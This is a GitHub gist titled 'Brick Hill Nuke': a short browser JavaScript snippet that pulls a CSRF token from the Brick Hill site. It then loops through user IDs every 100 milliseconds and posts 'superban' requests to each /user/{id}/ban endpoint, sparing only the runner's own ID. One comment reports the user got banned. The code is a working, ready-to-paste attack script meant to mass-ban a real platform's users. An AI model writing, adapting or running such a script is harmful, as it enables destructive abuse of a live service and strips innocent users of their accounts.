Skip to content

Instantly share code, notes, and snippets.

@gtoriadotnet
Created February 12, 2024 23:31
Show Gist options
  • Save gtoriadotnet/1ba15e942610c46805e1e63ef539e661 to your computer and use it in GitHub Desktop.
Save gtoriadotnet/1ba15e942610c46805e1e63ef539e661 to your computer and use it in GitHub Desktop.
Brick Hill Nuke
let YOURUSERIDHERE = 33532;
let i = 0;
setInterval(function() {
fetch('https://www.brick-hill.com/currency/', {
"headers": {
"accept": "text/html",
},
"body": null,
"method": "GET",
"mode": "cors",
"credentials": "include"
}).then(function(r){
return r.text();
}).then(function(body){
return $('<tmp>').append($.parseHTML(body))[0].querySelector('form[action="https://www.brick-hill.com/currency"]')._token.value;
}).then(function(csrfToken){
if(i == YOURUSERIDHERE) return;
fetch(`https://www.brick-hill.com/user/${i}/ban`, {
"headers": {
"accept": "text/html",
"content-type": "application/x-www-form-urlencoded"
},
"body": `_token=${csrfToken}&superban=1`,
"method": "POST",
"mode": "cors",
"credentials": "include"
});
});
i++;
}, 100);
@danyalassi
Copy link

10/10 got banned

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment